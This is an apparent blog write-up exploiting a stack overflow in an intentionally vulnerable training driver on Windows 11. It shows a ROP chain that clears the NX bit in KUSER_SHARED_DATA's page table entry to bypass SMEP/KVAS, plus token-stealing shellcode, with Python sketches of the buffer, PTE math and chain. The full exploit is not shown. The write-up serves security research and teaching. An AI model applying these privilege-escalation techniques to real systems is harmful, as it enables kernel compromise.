Exploiting a kernel stack overflow in Windows 11?
Environment Setup
OS: Windows 11 22000.556 VM
HackSysExtremeVulnerableDriver 3.0
Articles on setting up remote kernel debugging and loading the driver can be easily found online, so I’ll skip that part and focus on the technical details.
Introduction
Since the driver is intentionally vulnerable, almost no reverse engineering is needed to locate the bug, so there is no point writing about that part either.
Essentially, there is a kernel stack-based buffer overflow, and we can control RIP at offset 2072 (0x818) by sending a buffer with IOCTL code 0x222003.
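The buffer layout can be sketched in Python. The sketch assumes only what the text states: 2072 bytes of filler, then an 8-byte little-endian value that lands in RIP. `build_overflow_buffer` is a hypothetical helper. Sending the buffer to the driver (for example with DeviceIoControl and IOCTL 0x222003) is not shown.

```python
import struct

RIP_OFFSET = 2072  # 0x818 bytes of filler before the saved return address

def build_overflow_buffer(rip: int, filler: int = 0x41) -> bytes:
    """Fill up to the saved return address, then append RIP as a little-endian qword."""
    return bytes([filler]) * RIP_OFFSET + struct.pack("<Q", rip)

payload = build_overflow_buffer(0x4141414141414141)
print(len(payload), hex(RIP_OFFSET))  # 2080 0x818
```

With the default filler, the whole buffer is just "A" bytes. That is why the crash below shows RIP = 0x4141414141414141.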
First 0x4141414141414141
We’ll start by writing some base code to trigger the vulnerability and control RIP.
Access violation - code c0000005 (!!! second chance !!!)
Running the PoC gives us a crash in which we control RIP reliably.
Theory
From here we have a few options.
We can either attempt to gain shellcode execution, or try to achieve our goals with pure ROP, reusing only existing kernel code.
Since a vanilla stack overflow is a rather powerful primitive, I’m more interested in finding out whether full shellcode execution is possible.
However, the year is 2022 and we are on Windows 11. Even the default installation enables many mitigations (SMEP, KASLR, KVAS, etc.), and we have to bypass them before we get any chance to execute code.
SMEP
Supervisor Mode Execution Prevention is enabled by setting bit 20 (counting from 0) of the CR4 register, as shown below.
0: kd> r cr4
This means any attempt to execute user-mode memory while in kernel mode raises an exception (a page fault) and eventually causes a BSOD.
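Checking the SMEP bit is a single mask operation. The CR4 value below is hypothetical, not the one from the debugger session. `without_smep` shows what a classic CR4-based ROP bypass would write. As explained under KVAS, that write alone is not enough on this target.

```python
SMEP_BIT = 20  # CR4.SMEP, counting bits from 0

def smep_enabled(cr4: int) -> bool:
    """Return True if the SMEP bit is set in a CR4 value."""
    return bool(cr4 & (1 << SMEP_BIT))

def without_smep(cr4: int) -> int:
    """Return the CR4 value with only the SMEP bit cleared."""
    return cr4 & ~(1 << SMEP_BIT)

cr4 = 0x350EF8  # hypothetical CR4 value, not read from a real machine
print(smep_enabled(cr4), hex(without_smep(cr4)))  # True 0x250ef8
```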
KASLR
Addresses of ntoskrnl.exe exports and other data structures are randomized on boot. This is pretty useless from an LPE standpoint, since any medium integrity process can query the base addresses of loaded drivers and compute export addresses from them.
KVAS
Kernel Virtual Address Shadow is Windows’ implementation of KPTI. It also implements software-based SMEP, which marks user pages as NX in the kernel’s page tables regardless of the SMEP bit in CR4.
With these in mind, we can start thinking about the bypasses.
Bypassing KASLR is simple: we use the documented API EnumDeviceDrivers to get the base address of nt. From there we can calculate the addresses of symbols at runtime.
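Once the base of nt is known, each symbol or gadget address is just base + RVA. A common way to get an export's RVA is to load ntoskrnl.exe into a user-mode process and subtract the module handle from the GetProcAddress result. Non-exported functions such as nt!MiGetPteAddress need an offset taken from symbols or WinDbg instead. All numbers below are hypothetical and must be recomputed for the exact build.

```python
# Hypothetical RVAs (offsets from the start of ntoskrnl.exe); real values depend on the build.
HYPOTHETICAL_RVAS = {
    "nt!MiGetPteAddress": 0x2A1F00,
    "pop rax; ret": 0x201A2B,
}

def rva_from_user_mapping(proc_addr: int, user_module_base: int) -> int:
    """RVA of an export in a user-mode mapping of ntoskrnl.exe (GetProcAddress result minus HMODULE)."""
    return proc_addr - user_module_base

def rebase(nt_base: int, rvas: dict) -> dict:
    """Kernel address = runtime base of nt (e.g. from EnumDeviceDrivers) + RVA."""
    return {name: nt_base + rva for name, rva in rvas.items()}

nt_base = 0xFFFFF80012000000  # hypothetical base address
for name, addr in rebase(nt_base, HYPOTHETICAL_RVAS).items():
    print(f"{name:<20} {addr:#018x}")
```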
SMEP, however, is more difficult to deal with. For starters, we can’t just use ROP to clear the SMEP bit in CR4, because software-based SMEP does not care about it: with KVAS, user pages are already marked NX in the kernel’s page tables.
Instead, we will have to turn our stack overflow into an arbitrary write primitive and use it to corrupt some important structures, namely page table entries.
PTE
The Page Table Entry (PTE) is part of the paging structures used by Windows. More details can easily be found online. The important part is that the PTE indicates whether a page is executable or not.
In Windows, a PTE is described by the type MMPTE_HARDWARE:
0: kd> !pte 0xFFFFF78000000000
As shown above, we inspect the PTE of KUSER_SHARED_DATA, a static section.
This is a writable page in kernel space, always mapped at the same address, 0xFFFFF78000000000.
The NX bit is the highest bit (bit 63) of the PTE. This means that if we clear the most significant byte of KUSER_SHARED_DATA’s PTE, we can make the section executable.
0: kd> ? 0y0000000000000000000000000000000000000100001100110001100101100011
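The effect of clearing the top byte can be checked in Python. The PTE value here is hypothetical. The byte-write model relies on x64 being little-endian: a one-byte write of 0 at the PTE address + 7 zeroes bits 56 to 63, which include NX. The sketch only shows which bits change; it does not model the other fields of MMPTE_HARDWARE.

```python
import struct

NX_BIT = 63

def nx_set(pte: int) -> bool:
    """Return True if the NX (execute-disable) bit is set."""
    return bool((pte >> NX_BIT) & 1)

def clear_top_byte(pte: int) -> int:
    """Zero bits 56..63 of the PTE; this includes NX (bit 63)."""
    return pte & 0x00FF_FFFF_FFFF_FFFF

def clear_top_byte_via_byte_write(pte: int) -> int:
    """Same effect, modelled as a 1-byte write of 0 at (PTE address + 7)."""
    raw = bytearray(struct.pack("<Q", pte))  # little-endian: raw[7] is the most significant byte
    raw[7] = 0
    return struct.unpack("<Q", bytes(raw))[0]

pte = 0x8A00000012345963  # hypothetical PTE value with NX set
print(nx_set(pte), hex(clear_top_byte(pte)), nx_set(clear_top_byte(pte)))  # True 0x12345963 False
```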
Since the important data occupies only about the first 0x700 bytes of KUSER_SHARED_DATA, while a page is 0x1000 bytes, we are free to write anything from around KUSER_SHARED_DATA+0x800 onwards.
Now we have a general plan.
- Use ROP to disable NX
- Copy shellcode to KUSER_SHARED_DATA+0x800
- Jump to shellcode
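The copy step can be sketched as follows, assuming a qword-sized arbitrary write primitive. Each 8-byte chunk of shellcode becomes one (address, value) write into the free tail of KUSER_SHARED_DATA. `qword_writes` and the NOP padding are illustrative choices, not taken from the original exploit.

```python
import struct

KUSER_SHARED_DATA = 0xFFFFF78000000000
PAGE_SIZE = 0x1000
SHELLCODE_OFFSET = 0x800
SHELLCODE_ADDR = KUSER_SHARED_DATA + SHELLCODE_OFFSET  # 0xFFFFF78000000800
MAX_SHELLCODE_LEN = PAGE_SIZE - SHELLCODE_OFFSET       # 0x800 bytes left in the page

def qword_writes(shellcode: bytes, base: int = SHELLCODE_ADDR) -> list:
    """Split shellcode into (address, qword) pairs, one per 8-byte arbitrary write."""
    if len(shellcode) > MAX_SHELLCODE_LEN:
        raise ValueError("shellcode does not fit in the rest of the page")
    padded = shellcode + b"\x90" * (-len(shellcode) % 8)  # pad with NOPs to a multiple of 8
    return [(base + off, struct.unpack_from("<Q", padded, off)[0])
            for off in range(0, len(padded), 8)]

for addr, value in qword_writes(b"\xcc" * 10):
    print(hex(addr), hex(value))
```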
Gadget hunting
As far as I know, there are two easy ways to find gadgets in kernel land:
- Use a tool like rp++ against C:\Windows\System32\ntoskrnl.exe.
- Use WinDbg’s search function.
For short gadgets (one instruction before ret), I usually search in WinDbg directly.
For example, if I’m looking for a pop r14; pop r15; ret; gadget, I do the following:
0: kd> lm m nt
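A gadget search is a byte-pattern search over nt's image range. In WinDbg that is something like `s -b <start> <end> 41 5e 41 5f c3`, using the range printed by `lm m nt`. The Python equivalent below searches a bytes buffer. The blob is a hypothetical stand-in for a dump of nt's code, and `find_pattern` is a hypothetical helper.

```python
# pop r14 = 41 5E, pop r15 = 41 5F, ret = C3
POP_R14_POP_R15_RET = bytes([0x41, 0x5E, 0x41, 0x5F, 0xC3])

def find_pattern(image: bytes, pattern: bytes, base: int = 0) -> list:
    """Return base + offset for every (possibly overlapping) occurrence of pattern."""
    hits, start = [], 0
    while True:
        idx = image.find(pattern, start)
        if idx == -1:
            return hits
        hits.append(base + idx)
        start = idx + 1

# Hypothetical code bytes standing in for a dump of nt's code section.
blob = b"\x00" * 4 + POP_R14_POP_R15_RET + b"\x90" + POP_R14_POP_R15_RET
print([hex(a) for a in find_pattern(blob, POP_R14_POP_R15_RET, base=0x1000)])  # ['0x1004', '0x100a']
```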
The arbitrary write gadgets I’ll use revolve around RAX and RCX, since gadgets using these registers are the most common.
Of course we need:
1. pop rax; ret;
2. pop rcx; ret;
Next, I used the following for the arbitrary write:
3. mov qword ptr [rax], rcx; ret;
Finally, to manipulate the PTE (we’ll see how it’s done shortly):
4. add rax, qword ptr [rcx]; ret;
5. mov byte ptr [rax], cl; ret;
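For searching, it helps to know the raw bytes of each gadget. The encodings below are the standard x64 encodings, listed with the byte-store gadget written as `mov byte ptr [rax], cl`, since a byte store can only write the low byte of RCX. A real search may also turn up other encodings of the same instructions. The `GADGETS` table is only a reference list.

```python
GADGETS = {
    1: ("pop rax; ret", bytes.fromhex("58 c3")),
    2: ("pop rcx; ret", bytes.fromhex("59 c3")),
    3: ("mov qword ptr [rax], rcx; ret", bytes.fromhex("48 89 08 c3")),
    4: ("add rax, qword ptr [rcx]; ret", bytes.fromhex("48 03 01 c3")),
    5: ("mov byte ptr [rax], cl; ret", bytes.fromhex("88 08 c3")),
}

for number, (text, code) in GADGETS.items():
    print(number, code.hex(" "), text)
```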
PTE Manipulation
Before we can clear the most significant byte of KUSER_SHARED_DATA’s PTE, we have to locate it in memory.
Windows has an internal kernel function that does exactly that, nt!MiGetPteAddress:
0: kd> u nt!MiGetPteAddress
As per the x64 __fastcall convention, RCX holds the first argument passed to this function, which is the virtual address mapped by the PTE.
So, to find the PTE of address X, we compute ((X >> 9) & 0x7ffffffff8) + PTE_BASE.
PTE_BASE is affected by KASLR, but we can locate it dynamically by reading the qword at nt!MiGetPteAddress+0x13:
0: kd> dq nt!MiGetPteAddress+0x13 L1
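The formula mirrors what nt!MiGetPteAddress computes. `va >> 12` is the virtual page number, and each PTE is 8 bytes, so the byte offset is `(va >> 12) * 8`. That equals `va >> 9` with the low 3 bits cleared. The mask keeps the 36 page-number bits of a 48-bit address. PTE_BASE below is the well-known fixed value from older Windows versions, used here only as a hypothetical stand-in for the value read at runtime.

```python
MASK64 = (1 << 64) - 1

def get_pte_address(va: int, pte_base: int) -> int:
    """((va >> 9) & 0x7ffffffff8) + PTE_BASE, i.e. PTE_BASE + 8 * virtual page number."""
    return (((va >> 9) & 0x7FFFFFFFF8) + pte_base) & MASK64

KUSER_SHARED_DATA = 0xFFFFF78000000000
PTE_BASE = 0xFFFFF68000000000  # hypothetical; randomized on modern Windows
print(hex(get_pte_address(KUSER_SHARED_DATA, PTE_BASE)))  # 0xfffff6fbc0000000
```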
Hence, we first load the (X >> 9) & 0x7ffffffff8 part into RAX and point RCX to nt!MiGetPteAddress+0x13. Then we use gadget 4 to compute the PTE address, before using gadget 5 to clear the most significant byte. Note that x64 is little-endian, so that byte sits at the PTE address + 7, and CL must be 0 when gadget 5 runs.
The code will look like this:
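The PTE step of the chain can be modelled in Python to check the arithmetic. This is a sketch, not the exploit code. The `Machine` class, the address of nt!MiGetPteAddress+0x13, PTE_BASE and the PTE value are all hypothetical. The gadgets are modelled by name only, in the order they would sit on the stack.

```python
MASK64 = (1 << 64) - 1

class Machine:
    """Toy model of RAX, RCX and byte-addressed memory (not a real CPU emulator)."""

    def __init__(self):
        self.rax = 0
        self.rcx = 0
        self.mem = {}  # address -> byte value; unset bytes read as 0

    def read_qword(self, addr):
        return int.from_bytes(bytes(self.mem.get(addr + i, 0) for i in range(8)), "little")

    def write_qword(self, addr, value):
        for i, byte in enumerate((value & MASK64).to_bytes(8, "little")):
            self.mem[addr + i] = byte

def run_chain(m, chain):
    """Execute gadget names in stack order; 'pop' gadgets consume the next item as data."""
    items = iter(chain)
    for gadget in items:
        if gadget == "pop rax; ret":                        # gadget 1
            m.rax = next(items)
        elif gadget == "pop rcx; ret":                      # gadget 2
            m.rcx = next(items)
        elif gadget == "mov qword ptr [rax], rcx; ret":     # gadget 3
            m.write_qword(m.rax, m.rcx)
        elif gadget == "add rax, qword ptr [rcx]; ret":     # gadget 4
            m.rax = (m.rax + m.read_qword(m.rcx)) & MASK64
        elif gadget == "mov byte ptr [rax], cl; ret":       # gadget 5
            m.mem[m.rax] = m.rcx & 0xFF
        else:
            raise ValueError(f"unknown gadget: {gadget}")

KUSER_SHARED_DATA = 0xFFFFF78000000000
PTE_BASE = 0xFFFFF68000000000        # hypothetical value stored at nt!MiGetPteAddress+0x13
PTE_BASE_SLOT = 0xFFFFF80012345013   # hypothetical address of nt!MiGetPteAddress+0x13
pte_offset = (KUSER_SHARED_DATA >> 9) & 0x7FFFFFFFF8
pte_addr = PTE_BASE + pte_offset

m = Machine()
m.write_qword(PTE_BASE_SLOT, PTE_BASE)
m.write_qword(pte_addr, 0x8A00000012345963)  # hypothetical PTE with NX (bit 63) set

run_chain(m, [
    "pop rax; ret", pte_offset + 7,    # +7: most significant byte of a little-endian qword
    "pop rcx; ret", PTE_BASE_SLOT,
    "add rax, qword ptr [rcx]; ret",   # rax = PTE address + 7
    "pop rcx; ret", 0,                 # cl = 0
    "mov byte ptr [rax], cl; ret",     # zero bits 56..63, including NX
])
print(hex(m.read_qword(pte_addr)))  # 0x12345963
```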
Shellcoding
Kernel shellcode is rather simple and does not require us to resolve any addresses.
Extensive documentation can be found online, so I’ll just talk about the parts I modified.
// rax contains pid of spawned cmd
First, the offsets of ActiveProcessLinks and Token within _EPROCESS changed from Windows 10 to Windows 11, so it’s important to look them up with WinDbg (for example with dt nt!_EPROCESS).
At the end of the shellcode, I inserted an infinite loop, because I found proper kernel recovery extremely difficult. I could have used nt!KiDelayExecutionThread as a cleaner way to suspend the thread, but that led to a crash very quickly, possibly due to resource locking.
Since the current thread will be spinning forever, I can’t just copy the privileged token to the current process. Instead, I pass the PID of a newly spawned process in RAX and relay the token to it.
Some people prefer to clear the refcount of the token, but I found it pointless for two reasons. First, the refcount is not strictly controlled, as can be inferred from ReactOS’s source code (if refcount == 1, it is brought back to the maximum again). Second, it’s just a fast refcount: even if it runs out, a slow path is taken and things still work just fine.
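The Token field of _EPROCESS is an _EX_FAST_REF. On x64 its low 4 bits hold the fast reference count, and the remaining bits hold the token object pointer. "Clearing the refcount" therefore just means masking those 4 bits. The field value below is hypothetical.

```python
MASK64 = (1 << 64) - 1
FAST_REF_BITS = 4                         # RefCnt width in the x64 _EX_FAST_REF
FAST_REF_MASK = (1 << FAST_REF_BITS) - 1  # 0xF

def decode_fast_ref(value: int) -> tuple:
    """Split an _EX_FAST_REF value into (object pointer, fast reference count)."""
    return value & ~FAST_REF_MASK & MASK64, value & FAST_REF_MASK

token_field = 0xFFFF8A0F1234567B  # hypothetical EPROCESS.Token value
obj, refcnt = decode_fast_ref(token_field)
print(hex(obj), refcnt)  # 0xffff8a0f12345670 11
```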
To convert assembly to shellcode, I simply used an online assembler and Python.
def make(s):
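A conversion step of this kind can be sketched in Python. It assumes the online assembler prints the machine code as hex (with or without spaces) and that the exploit embeds the shellcode as a C byte array. `hex_to_c_array` is a hypothetical helper, not the author's `make`.

```python
def hex_to_c_array(hex_text: str, name: str = "shellcode") -> str:
    """Turn assembler hex output into a C array initializer."""
    data = bytes.fromhex(hex_text)  # spaces between byte pairs are ignored
    body = ", ".join(f"0x{b:02x}" for b in data)
    return f"unsigned char {name}[] = {{ {body} }};"

print(hex_to_c_array("90 c3"))  # unsigned char shellcode[] = { 0x90, 0xc3 };
```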
Final Exploit
system!
Conclusion
It feels amazing to finally do some research on the Windows kernel, a dream target of mine. However, I do need to learn to perform proper kernel recovery, because letting the thread spin forever wastes a lot of CPU time and might cause system instability. I recently bought the book Windows Kernel Programming (2nd Edition), and hopefully I’ll learn more about Windows internals. Looking forward to many more blog posts on the Windows kernel :)